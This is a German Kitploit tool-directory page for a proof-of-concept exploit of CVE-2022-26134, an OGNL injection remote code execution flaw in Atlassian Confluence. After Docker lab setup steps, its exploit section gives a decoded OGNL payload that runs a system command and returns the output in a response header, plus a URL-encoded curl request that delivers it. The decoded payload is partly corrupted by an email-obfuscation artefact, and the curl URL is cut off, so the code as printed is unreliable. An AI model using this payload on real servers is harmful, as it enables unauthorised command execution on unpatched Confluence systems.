Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-26134 — Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Schwachstelle (CVE-2022-26134) | Kitploit
Tools/GitHubGitHub/coldfusionx/cve-2022-26134
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubcoldfusionx/cve-2022-26134

CVE-2022-26134

Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Schwachstelle (CVE-2022-26134)

Repository anzeigen
22vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

POC - Atlassian Confluence OGNL-Injection Sicherheitslücke für Remote-Codeausführung (RCE) (CVE-2022-26134)

Getestet mit Confluence Version 7.13.6

Einrichtung der Umgebung

  • Klonen Sie das Repository
root@kitploit:~
docker-compose up -d 
  • Unter http://localhost:8090 sehen Sie Confluence laufen.

  • Besorgen Sie sich als Nächstes eine Evaluierungslizenz für Confluence und richten Sie die Datenbank mit dem Datenbanknamen confluence, dem Benutzernamen postgres und dem Passwort root ein.

Exploit

  • Dekodierter Payload
root@kitploit:~
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
  • Curl-Anfrage
root@kitploit:~
curl -v "http://localhost:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%
  • POC poc
Tool herunterladen